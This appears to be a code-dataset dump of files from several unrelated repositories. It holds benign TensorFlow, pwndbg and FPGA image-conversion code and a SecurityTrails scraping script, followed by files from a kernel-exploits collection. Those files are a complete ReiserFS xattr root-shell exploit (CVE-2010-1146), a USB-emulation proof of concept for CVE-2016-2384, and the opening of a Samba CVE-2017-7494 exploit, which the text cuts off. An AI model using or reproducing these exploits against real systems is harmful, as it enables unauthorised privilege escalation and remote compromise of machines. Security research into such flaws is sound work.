"""Secondary feature for returning a tensor of ones."""
def __init__(self, args_dict, shapes_dict, dtypes_dict):
shape_key, static_shape, dtype = _parse_shape_and_dtype(args_dict, shapes_dict, dtypes_dict)
self._shape_key = shape_key
self._static_shape = static_shape
self._dtype = dtype
def get_static_shape(self):
return self._static_shape
def get_dtype(self):
return self._dtype
def get_tensor(self, primary_tensors_dict):
if self._shape_key is not None:
with tf.control_dependencies([primary_tensors_dict[self._shape_key]]):
tensor = tf.ones_like(primary_tensors_dict[self._shape_key], dtype=self._dtype)
else:
tensor = tf.ones(self._static_shape, dtype=self._dtype)
return tensor
```
#### File: 0xsx/nnmaker/train_estimator.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2" # Filter everything but errors.
import logging
import numpy as np
import nnetmaker as nn
import tensorflow as tf
import traceback
class TrainCheckpointSaverListener(tf.train.CheckpointSaverListener):
"""CheckpointSaverListener that just logs an info message every save."""
def __init__(self):
self._logger = logging.getLogger()
def after_save(self, session, global_step_value):
self._logger.info("%d: Wrote checkpoint." % global_step_value)
def run_training(model, train_loader, val_loader, params, logger, np_rand_state):
"""Runs training and evaluation until stopped."""
run_config = tf.estimator.RunConfig(model_dir=model.model_dir,
tf_random_seed=np_rand_state.randint(12345, 2**32),
save_checkpoints_secs=params["save_time"])
estimator = tf.estimator.Estimator(model_fn=model.build_model_fn(),
config=run_config, params=params)
try:
train_spec = tf.estimator.TrainSpec(input_fn=train_loader.build_input_fn())
eval_spec = tf.estimator.EvalSpec(input_fn=val_loader.build_input_fn(),
steps=None, throttle_secs=params["val_throttle_time"])
tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
except KeyboardInterrupt:
logger.info("Stopped by user.")
def main(config_filename):
try:
# Parse and validate the specified configuration.
tup = nn.load_config(config_filename)
rand_seed = tup[0]
epsilon = tup[1]
model_type = tup[2]
model_args = tup[3]
input_args = tup[4]
init_args = tup[5]
train_args = tup[6]
logger_args = tup[7]
# Initialize the logger.
nn.configure_logger(logger_args)
logger = logging.getLogger()
# Initialize random number generators.
tf_rand_seed, np_rand_seed = nn.configure_seeds(2, rand_seed)
tf.set_random_seed(tf_rand_seed)
np_rand_state = np.random.RandomState(np_rand_seed)
# Initialize the model and input loaders.
model = nn.MODELS[model_type](model_args, epsilon=epsilon)
train_loader = nn.configure_input(model.input_names, model.target_names,
input_args, nn.INPUT_TRAIN)
val_loader = nn.configure_input(model.input_names, model.target_names,
input_args, nn.INPUT_VAL)
params = nn.configure_estimator_params(init_args, train_args)
assert train_loader.target_batch_size == val_loader.target_batch_size
model._batch_size = train_loader.target_batch_size
# Run training loop.
run_training(model, train_loader, val_loader, params, logger, np_rand_state)
except Exception as ex:
logger = logging.getLogger()
ex_str = traceback.format_exc()
logger.error(ex_str)
exit(1)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("config_filename", help="Filename of json model config file")
args = parser.parse_args()
main(os.path.realpath(args.config_filename))
``` |
{
"source": "0xTac/ppwndbg",
"score": 3
} |
#### File: pwndbg/disasm/x86.py
```python
import collections
from capstone import *
from capstone.x86 import *
import pwndbg.arch
import pwndbg.memory
import pwndbg.regs
import pwndbg.typeinfo
groups = {v:k for k,v in globals().items() if k.startswith('X86_GRP_')}
ops = {v:k for k,v in globals().items() if k.startswith('X86_OP_')}
regs = {v:k for k,v in globals().items() if k.startswith('X86_REG_')}
access = {v:k for k,v in globals().items() if k.startswith('CS_AC_')}
pc = X86_REG_RIP
class DisassemblyAssistant(pwndbg.disasm.arch.DisassemblyAssistant):
def regs(self, instruction, reg):
if reg == X86_REG_RIP:
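# RIP reads as the address of the instruction *after* the current one.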
return instruction.address + instruction.size
elif instruction.address == pwndbg.regs.pc:
name = instruction.reg_name(reg)
return pwndbg.regs[name]
else:
return None
def memory(self, instruction, op):
current = (instruction.address == pwndbg.regs.pc)
# The only register we can reason about if it's *not* the current
# instruction is $rip. For example:
# lea rdi, [rip - 0x1f6]
target = 0
# There doesn't appear to be a good way to read from segmented
# addresses within GDB.
if op.mem.segment != 0:
return None
if op.mem.base != 0:
base = self.regs(instruction, op.mem.base)
if base is None:
return None
target += base
if op.mem.disp != 0:
target += op.mem.disp
if op.mem.index != 0:
scale = op.mem.scale
index = self.regs(instruction, op.mem.index)
if index is None:
return None
target += (scale * index)
return target
def memory_sz(self, instruction, op):
arith = False
segment = op.mem.segment
disp = op.value.mem.disp
base = op.value.mem.base
index = op.value.mem.index
scale = op.value.mem.scale
sz = ''
if segment != 0:
sz += '%s:' % instruction.reg_name(segment)
if base != 0:
sz += instruction.reg_name(base)
arith = True
if index != 0:
if arith:
sz += ' + '
index = pwndbg.regs[instruction.reg_name(index)]
sz += "%s*%#x" % (index, scale)
arith = True
if op.mem.disp != 0:
if arith and op.mem.disp < 0:
sz += ' - '
elif arith and op.mem.disp >= 0:
sz += ' + '
sz += '%#x' % abs(op.mem.disp)
sz = '[%s]' % sz
return sz
def register(self, instruction, operand):
if operand.value.reg != X86_REG_RIP:
return super(DisassemblyAssistant, self).register(instruction, operand)
return instruction.address + instruction.size
def next(self, instruction, call=False):
# Only enhance 'ret'
if X86_INS_RET != instruction.id or len(instruction.operands) > 1:
return super(DisassemblyAssistant, self).next(instruction, call)
# Stop disassembling at RET if we won't know where it goes to
if instruction.address != pwndbg.regs.pc:
return None
# Otherwise, resolve the return on the stack
pop = 0
if instruction.operands:
pop = instruction.operands[0].int
address = (pwndbg.regs.sp) + (pwndbg.arch.ptrsize * pop)
if pwndbg.memory.peek(address):
return int(pwndbg.memory.poi(pwndbg.typeinfo.ppvoid, address))
def condition(self, instruction):
# JMP is unconditional
if instruction.id in (X86_INS_JMP, X86_INS_RET, X86_INS_CALL):
return None
# We can't reason about anything except the current instruction
if instruction.address != pwndbg.regs.pc:
return False
efl = pwndbg.regs.eflags
cf = efl & (1<<0)
pf = efl & (1<<2)
af = efl & (1<<4)
zf = efl & (1<<6)
sf = efl & (1<<7)
of = efl & (1<<11)
return {
X86_INS_CMOVA: not (cf or zf),
X86_INS_CMOVAE: not cf,
X86_INS_CMOVB: cf,
X86_INS_CMOVBE: cf or zf,
X86_INS_CMOVE: zf,
X86_INS_CMOVG: not zf and (sf == of),
X86_INS_CMOVGE: sf == of,
X86_INS_CMOVL: sf != of,
X86_INS_CMOVLE: zf or (sf != of),
X86_INS_CMOVNE: not zf,
X86_INS_CMOVNO: not of,
X86_INS_CMOVNP: not pf,
X86_INS_CMOVNS: not sf,
X86_INS_CMOVO: of,
X86_INS_CMOVP: pf,
X86_INS_CMOVS: sf,
X86_INS_JA: not (cf or zf),
X86_INS_JAE: not cf,
X86_INS_JB: cf,
X86_INS_JBE: cf or zf,
X86_INS_JE: zf,
X86_INS_JG: not zf and (sf == of),
X86_INS_JGE: sf == of,
X86_INS_JL: sf != of,
X86_INS_JLE: zf or (sf != of),
X86_INS_JNE: not zf,
X86_INS_JNO: not of,
X86_INS_JNP: not pf,
X86_INS_JNS: not sf,
X86_INS_JO: of,
X86_INS_JP: pf,
X86_INS_JS: sf,
}.get(instruction.id, None)
assistant = DisassemblyAssistant('i386')
assistant = DisassemblyAssistant('x86-64')
``` |
{
"source": "0xtaruhi/PlaneWar",
"score": 3
} |
#### File: PlaneWar/utils/gen_coe.py
```python
import numpy as np
import matplotlib.pyplot as plt
import cv2
class GenCoe:
def __init__(self, dir:str, filename:str, mode="gray"):
self.dir = dir
self.filename = filename
loc = self.dir + "\\" + self.filename
self.img = cv2.imread(loc, cv2.IMREAD_UNCHANGED)
self.height, self.width, g = (self.img.shape)
self.grayinfo = np.empty((self.height * self.width)).astype(np.int32)
self.alphainfo = np.empty((self.height * self.width)).astype(np.int32)
self.colorinfo = np.empty((self.height * self.width, 3)).astype(np.int32)
self.monoinfo = np.empty((self.height, self.width)).astype(np.int8)
if mode == "gray":
self.gray()
elif mode == "mono":
self.mono()
elif mode == "color":
self.color()
def readimage(self, dir, filename, mode="gray"):
GenCoe.__init__(self, dir, filename, mode)
def gray(self):
def list_aver(list):
aver = 0
for item in list:
aver += item
aver /= len(list)
return aver
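# Quantize each pixel to 4-bit grayscale (value / 16) and 1-bit alpha (alpha / 128).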
for row_idx in range(self.height):
for col_idx in range(self.width):
self.grayinfo[row_idx * self.width + col_idx] = (int)(list_aver(self.img[row_idx][col_idx][0:3]/16))
self.alphainfo[row_idx * self.width + col_idx] = (int)(self.img[row_idx][col_idx][3]/128)
def color(self):
for row_idx in range(self.height):
for col_idx in range(self.width):
self.colorinfo[row_idx * self.width + col_idx][0] = (int)(self.img[row_idx][col_idx][2] / 16)
self.colorinfo[row_idx * self.width + col_idx][1] = (int)(self.img[row_idx][col_idx][1] / 16)
self.colorinfo[row_idx * self.width + col_idx][2] = (int)(self.img[row_idx][col_idx][0] / 16)
self.alphainfo[row_idx * self.width + col_idx] = (int)(self.img[row_idx][col_idx][3] / 128)
def mono(self):
for row_idx in range(self.height):
for col_idx in range(self.width):
# self.monoinfo[row_idx][col_idx] = (int)(self.img[row_idx][col_idx][3] / 128)
pixel = self.img[row_idx][col_idx]
self.monoinfo[row_idx][col_idx] = 1 if (int(pixel[0]) + int(pixel[1]) + int(pixel[2]) < 300) else 0
def get_grayinfo(self):
return self.grayinfo
def get_alphainfo(self):
return self.alphainfo
def get_monoinfo(self):
return self.monoinfo
def get_colorinfo(self):
return self.colorinfo
@staticmethod
def to_binary(num, bitlen=-1):
res = bin(num)[2:]
if bitlen == -1:
return res
else:
for i in range(bitlen - len(res)):
res = '0' + res
return res
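# e.g. to_binary(5, bitlen=4) -> "0101"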
@staticmethod
def generate_coe(dir, filename, *infos):
coefile_location = dir + "\\" + filename
depth = len(infos[0][1])
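# Each entry of infos is a (kind, data) pair where kind is one of
# 'gray', 'alpha', 'mono' or 'color' and data is the matching pixel array.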
with open(coefile_location, 'w') as f:
f.write("memory_initialization_radix = 2;\n")
f.write("memory_initialization_vector = \n")
for i in range(depth):
rowinfo = ""
for info in infos:
if(info[0] == 'gray'):
rowinfo += GenCoe.to_binary(info[1][i], bitlen=4)
elif(info[0] == 'alpha'):
rowinfo += str(info[1][i])
elif(info[0] == 'mono'):
for j in range(len(info[1][i])):
rowinfo += str(info[1][i][j]) + ",\n"
elif(info[0] == 'color'):
rowinfo += GenCoe.to_binary(info[1][i][0], bitlen=4)
rowinfo += GenCoe.to_binary(info[1][i][1], bitlen=4)
rowinfo += GenCoe.to_binary(info[1][i][2], bitlen=4)
if info[0] == 'mono':
f.write(rowinfo)
else:
f.write(rowinfo + ",\n")
print("Generate COE file " + filename + " successfully, the depth is " + str(depth))
if __name__ == "__main__":
ori_dir = "D:\\fpga\\project\PlaneWar\\src\\img\\origin"
des_dir = "D:\\fpga\\project\PlaneWar\\src\\img"
def gen_me():
me1 = GenCoe(ori_dir, "me1.png")
me2 = GenCoe(ori_dir, "me2.png")
me_destroy_1 = GenCoe(ori_dir, "me_destroy_1.png")
me_destroy_3 = GenCoe(ori_dir, "me_destroy_3.png")
me_destroy_4 = GenCoe(ori_dir, "me_destroy_4.png")
# GenCoe.generate_coe(des_dir, 'me.coe', ('alpha', me1.get_alphainfo()), ('gray', me1.get_grayinfo()), \
# ('alpha', me2.get_alphainfo()), ('gray', me2.get_grayinfo()), \
# ('gray', me_destroy_1.get_grayinfo()), ('gray', me_destroy_3.get_grayinfo()), \
# ('gray', me_destroy_4.get_grayinfo()))
GenCoe.generate_coe(des_dir, 'me.coe', ('alpha', me1.get_alphainfo()), ('gray', me1.get_grayinfo()),\
('alpha', me2.get_alphainfo()), ('gray', me2.get_grayinfo()),\
('alpha', me_destroy_1.get_alphainfo()), ('gray', me_destroy_1.get_grayinfo()), \
('alpha', me_destroy_3.get_alphainfo()), ('gray', me_destroy_3.get_grayinfo()))
def gen_enemy1():
enemy1 = GenCoe(ori_dir, "enemy1.png")
enemy1_down1 = GenCoe(ori_dir, "enemy1_down1.png")
enemy1_down2 = GenCoe(ori_dir, "enemy1_down2.png")
enemy1_down3 = GenCoe(ori_dir, "enemy1_down3.png")
# enemy1_down4 = GenCoe(ori_dir, "enemy1_down4.png")
# GenCoe.generate_coe(des_dir, 'enemy1.coe', ('alpha', enemy1.get_alphainfo()), ('gray', enemy1.get_grayinfo()), \
# ('gray', enemy1_down1.get_grayinfo()), ('gray', enemy1_down2.get_grayinfo()), \
# ('alpha', enemy1_down3.get_alphainfo()), ('gray', enemy1_down3.get_grayinfo()))
GenCoe.generate_coe(des_dir, 'enemy1.coe', ('alpha', enemy1.get_alphainfo()), ('gray', enemy1.get_grayinfo()), \
('alpha', enemy1_down1.get_alphainfo()), ('gray', enemy1_down1.get_grayinfo()), \
('alpha', enemy1_down2.get_alphainfo()), ('gray', enemy1_down2.get_grayinfo()), \
('alpha', enemy1_down3.get_alphainfo()), ('gray', enemy1_down3.get_grayinfo()))
def gen_enemy2():
enemy2 = GenCoe(ori_dir, "enemy2.png")
enemy2_hit = GenCoe(ori_dir, "enemy2_hit.png")
enemy2_down1 = GenCoe(ori_dir, "enemy2_down1.png")
enemy2_down2 = GenCoe(ori_dir, "enemy2_down2.png")
enemy2_down3 = GenCoe(ori_dir, "enemy2_down3.png")
GenCoe.generate_coe(des_dir, 'enemy2.coe', \
('alpha', enemy2.get_alphainfo()), ('gray', enemy2.get_grayinfo()),\
('alpha', enemy2_hit.get_alphainfo()), ('gray', enemy2_hit.get_grayinfo()),\
('alpha', enemy2_down1.get_alphainfo()), ('gray', enemy2_down1.get_grayinfo()),\
('alpha', enemy2_down2.get_alphainfo()), ('gray', enemy2_down2.get_grayinfo()),\
('alpha', enemy2_down3.get_alphainfo()), ('gray', enemy2_down3.get_grayinfo()))
def gen_enemy3():
enemy3_n1 = GenCoe(ori_dir, 'enemy3_n1.png')
enemy3_n2 = GenCoe(ori_dir, 'enemy3_n2.png')
enemy3_hit = GenCoe(ori_dir, 'enemy3_hit.png')
enemy3_down1 = GenCoe(ori_dir, 'enemy3_down1.png')
enemy3_down2 = GenCoe(ori_dir, 'enemy3_down2.png')
enemy3_down3 = GenCoe(ori_dir, 'enemy3_down3.png')
enemy3_down4 = GenCoe(ori_dir, 'enemy3_down4.png')
enemy3_down5 = GenCoe(ori_dir, 'enemy3_down5.png')
GenCoe.generate_coe(des_dir, 'enemy3.coe', \
('alpha', enemy3_n1.get_alphainfo()), ('gray', enemy3_n1.get_grayinfo()), \
# ('alpha', enemy3_n2.get_alphainfo()), ('gray', enemy3_n2.get_grayinfo()), \
('alpha', enemy3_hit.get_alphainfo()), ('gray', enemy3_hit.get_grayinfo()), \
# ('alpha', enemy3_down1.get_alphainfo()), ('gray', enemy3_down1.get_grayinfo()), \
# ('alpha', enemy3_down2.get_alphainfo()), ('gray', enemy3_down2.get_grayinfo()), \
('alpha', enemy3_down3.get_alphainfo()), ('gray', enemy3_down3.get_grayinfo()), \
# ('alpha', enemy3_down4.get_alphainfo()), ('gray', enemy3_down4.get_grayinfo()), \
('alpha', enemy3_down5.get_alphainfo()), ('gray', enemy3_down5.get_grayinfo()))
def gen_startinfo():
startinfo = GenCoe(ori_dir, 'startinfo.png', mode="mono")
GenCoe.generate_coe(des_dir, 'startinfo.coe', ('mono', startinfo.get_monoinfo()))
# gen_enemy1()
def gen_bomb():
bomb_supply = GenCoe(ori_dir, 'bomb_supply.png', mode='color')
GenCoe.generate_coe(des_dir, 'bomb.coe', ('alpha', bomb_supply.get_alphainfo()),('color', bomb_supply.get_colorinfo()))
def gen_bullet_supply():
bullet_supply = GenCoe(ori_dir, 'bullet_supply.png', mode='color')
GenCoe.generate_coe(des_dir, 'bullet_supply.coe', ('alpha', bullet_supply.get_alphainfo()), ('color', bullet_supply.get_colorinfo()))
def gen_number():
number_dir = "D:\\fpga\\project\\PlaneWar\\src\\img\\origin\\numbers"
for i in range(10):
filename = str(i) + ".png"
number = GenCoe(number_dir, filename, mode='mono')
GenCoe.generate_coe(des_dir, str(i) + ".coe", ('mono', number.get_monoinfo()))
gen_me()
``` |
{
"source": "0xtavian/get_acquisitions.py",
"score": 3
} |
#### File: 0xtavian/get_acquisitions.py/get_acquisitions.py
```python
import requests,sys
import base64
import re
import argparse
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='Enter a domain name (-d) to pull acquisitions from SecurityTrails.com. Required arguments: email address (-e) and password (-p)')
parser.add_argument("-d")
parser.add_argument("-e")
parser.add_argument("-p")
args = parser.parse_args()
d = args.d
e = args.e
p = args.p
def get_acquisitions():
s=requests.Session()
r = s.get('https://securitytrails.com/app/account')
soup = BeautifulSoup(r.content, 'html.parser')
all_scripts = soup.find_all('script')
precsrf = all_scripts[9]
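# The CSRF token is assumed to sit in the 10th inline <script>; the value is
# taken from between the 3rd and 4th double quotes of the matching line.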
for line in precsrf:
csrf = line.split('"')[3]
r2 = s.post('https://securitytrails.com/app/api/console/account/login', json={"_csrf_token": csrf, "login": {"email": "{0}".format(e), "password": "{0}".format(p)}})
r3 = s.get('https://securitytrails.com/app/api/v1/surface_browser/acquisitions/{0}'.format(d))
content = r3.content
print(content.decode('utf-8'))
get_acquisitions()
``` |
{
"source": "0xToast/Linux-Kernel-Exploits",
"score": 3
} |
#### File: 2010/CVE-2010-1146/12130.py
```python
import os, sys
SHELL = 'int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", 0); }'
XATTR = '\x41\x58\x46\x52\xc1\x00\x00\x02\x01\x00\x00\x02\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
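# Serialized security.capability xattr blob; per the messages below it grants
# cap_setuid/cap_setgid on the target file.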
def err(txt):
print '[-] error: %s' % txt
sys.exit(1)
def msg(txt):
print '[+] %s' % txt
def main():
msg('checking for reiserfs mount with user_xattr mount option')
f = open('/etc/fstab')
for line in f:
if 'reiserfs' in line and 'user_xattr' in line:
break
else:
err('failed to find a reiserfs mount with user_xattr')
f.close()
msg('checking for private xattrs directory at /.reiserfs_priv/xattrs')
if not os.path.exists('/.reiserfs_priv/xattrs'):
err('failed to locate private xattrs directory')
msg('preparing shell in /tmp')
f = open('/tmp/team-edward.c', 'w')
f.write(SHELL)
f.close()
msg('capturing pre-shell snapshot of private xattrs directory')
pre = set(os.listdir('/.reiserfs_priv/xattrs'))
msg('compiling shell in /tmp')
ret = os.system('gcc -w /tmp/team-edward.c -o /tmp/team-edward')
if ret != 0:
err('error compiling shell, you need gcc')
msg('setting dummy xattr to get reiserfs object id')
os.system('setfattr -n "user.hax" -v "hax" /tmp/team-edward')
if ret != 0:
err('error setting xattr, you need setfattr')
msg('capturing post-shell snapshot of private xattrs directory')
post = set(os.listdir('/.reiserfs_priv/xattrs'))
objs = post.difference(pre)
msg('found %s new object ids' % len(objs))
for obj in objs:
msg('setting cap_setuid/cap_setgid capabilities on object id %s' % obj)
f = open('/.reiserfs_priv/xattrs/%s/security.capability' % obj, 'w')
f.write(XATTR)
f.close()
msg('spawning setuid shell...')
os.system('/tmp/team-edward')
if __name__ == '__main__':
main()
```
#### File: 2016/CVE-2016-2384/poc.py
```python
from USB import *
from USBDevice import *
from USBConfiguration import *
from USBInterface import *
class PwnUSBDevice(USBDevice):
name = "USB device"
def __init__(self, maxusb_app, verbose=0):
interface = USBInterface(
0, # interface number
0, # alternate setting
255, # interface class
0, # subclass
0, # protocol
0, # string index
verbose,
[],
{}
)
config = USBConfiguration(
1, # index
"Emulated Device", # string desc
[ interface ] # interfaces
)
USBDevice.__init__(
self,
maxusb_app,
0, # device class
0, # device subclass
0, # protocol release number
64, # max packet size for endpoint 0
0x0763, # vendor id
0x1002, # product id
0, # device revision
"Midiman", # manufacturer string
"MidiSport 2x2", # product string
"?", # serial number string
[ config ],
verbose=verbose
)
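# The Midiman MidiSport 2x2 IDs above make the host bind the vulnerable
# usb-midi driver (double-free, CVE-2016-2384).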
from Facedancer import *
from MAXUSBApp import *
sp = GoodFETSerialPort()
fd = Facedancer(sp, verbose=1)
u = MAXUSBApp(fd, verbose=1)
d = PwnUSBDevice(u, verbose=4)
d.connect()
try:
d.run()
except KeyboardInterrupt:
d.disconnect()
```
#### File: 2017/CVE-2017-7494/42060.py
```python
import argparse
import os.path
import sys
import tempfile
import time
from smb.SMBConnection import SMBConnection
from smb import smb_structs
from smb.base import _PendingRequest
from smb.smb2_structs import *
from smb.base import *
class SharedDevice2(SharedDevice):
def __init__(self, type, name, comments, path, password):
super().__init__(type, name, comments)
self.path = path
self.password = password
class SMBConnectionEx(SMBConnection):
def __init__(self, username, password, my_name, remote_name, domain="", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):
super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)
def hook_listShares(self):
self._listShares = self.listSharesEx
def hook_retrieveFile(self):
self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix
# This is maily the original listShares but request a higher level of info
def listSharesEx(self, callback, errback, timeout = 30):
if not self.has_authenticated:
raise NotReadyError('SMB connection not authenticated')
expiry_time = time.time() + timeout
path = 'IPC$'
messages_history = [ ]
def connectSrvSvc(tid):
m = SMB2Message(SMB2CreateRequest('srvsvc',
file_attributes = 0,
access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,
share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
oplock = SMB2_OPLOCK_LEVEL_NONE,
impersonation = SEC_IMPERSONATE,
create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,
create_disp = FILE_OPEN))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)
messages_history.append(m)
def connectSrvSvcCB(create_message, **kwargs):
messages_history.append(create_message)
if create_message.status == 0:
call_id = self._getNextRPCCallID()
# The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]
# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream
data_bytes = \
binascii.unhexlify(b"""05 00 0b 03 10 00 00 00 74 00 00 00""".replace(b' ', b'')) + \
struct.pack('<I', call_id) + \
binascii.unhexlify(b"""
b8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00
c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88
03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00
2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b
70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00
2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00
01 00 00 00
""".replace(b' ', b'').replace(b'\n', b''))
m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))
m.tid = create_message.tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)
messages_history.append(m)
else:
errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))
def rpcBindCB(trans_message, **kwargs):
messages_history.append(trans_message)
if trans_message.status == 0:
m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))
m.tid = trans_message.tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])
messages_history.append(m)
else:
closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')
def rpcReadCB(read_message, **kwargs):
messages_history.append(read_message)
if read_message.status == 0:
call_id = self._getNextRPCCallID()
padding = b''
remote_name = '\\\\' + self.remote_name
server_len = len(remote_name) + 1
server_bytes_len = server_len * 2
if server_len % 2 != 0:
padding = b'\0\0'
server_bytes_len += 2
# The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.
# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream
data_bytes = \
binascii.unhexlify(b"""05 00 00 03 10 00 00 00""".replace(b' ', b'')) + \
struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \
binascii.unhexlify(b"""4c 00 00 00 00 00 0f 00 00 00 02 00""".replace(b' ', b'')) + \
struct.pack('<III', server_len, 0, server_len) + \
(remote_name + '\0').encode('UTF-16LE') + padding + \
binascii.unhexlify(b"""
02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00
00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00
""".replace(b' ', b'').replace(b'\n', b''))
m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))
m.tid = read_message.tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])
messages_history.append(m)
else:
closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')
def listShareResultsCB(result_message, **kwargs):
messages_history.append(result_message)
if result_message.status == 0:
# The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.
data_bytes = result_message.payload.out_data
if data_bytes[3] & 0x02 == 0:
sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)
else:
decodeResults(result_message.tid, kwargs['fid'], data_bytes)
elif result_message.status == 0x0103: # STATUS_PENDING
self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])
else:
closeFid(result_message.tid, kwargs['fid'])
errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))
def decodeResults(tid, fid, data_bytes):
shares_count = struct.unpack('<I', data_bytes[36:40])[0]
results = [ ] # A list of SharedDevice2 instances
offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants
for i in range(0, shares_count):
results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))
offset += 12
for i in range(0, shares_count):
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
closeFid(tid, fid)
callback(results)
def sendReadRequest(tid, fid, data_bytes):
read_count = min(4280, self.max_read_size)
m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,
fid = fid, data_bytes = data_bytes)
def readCB(read_message, **kwargs):
messages_history.append(read_message)
if read_message.status == 0:
data_len = read_message.payload.data_length
data_bytes = read_message.payload.data
if data_bytes[3] & 0x02 == 0:
sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])
else:
decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])
else:
closeFid(read_message.tid, kwargs['fid'])
errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))
def closeFid(tid, fid, results = None, error = None):
m = SMB2Message(SMB2CloseRequest(fid))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)
messages_history.append(m)
def closeCB(close_message, **kwargs):
if kwargs['results'] is not None:
callback(kwargs['results'])
elif kwargs['error'] is not None:
errback(OperationFailure(kwargs['error'], messages_history))
if path not in self.connected_trees:
def connectCB(connect_message, **kwargs):
messages_history.append(connect_message)
if connect_message.status == 0:
self.connected_trees[path] = connect_message.tid
connectSrvSvc(connect_message.tid)
else:
errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))
m = SMB2Message(SMB2TreeConnectRequest(r'\\%s\%s' % ( self.remote_name.upper(), path )))
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)
messages_history.append(m)
else:
connectSrvSvc(self.connected_trees[path])
# Don't convert to Window style path
def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):
if not self.has_authenticated:
raise NotReadyError('SMB connection not authenticated')
messages_history = [ ]
def sendOpen(tid):
m = SMBMessage(ComOpenAndxRequest(filename = path,
access_mode = 0x0040, # Sharing mode: Deny nothing to others
open_mode = 0x0001, # Failed if file does not exist
search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,
timeout = timeout * 1000))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)
messages_history.append(m)
def openCB(open_message, **kwargs):
messages_history.append(open_message)
if not open_message.status.hasError:
if max_length == 0:
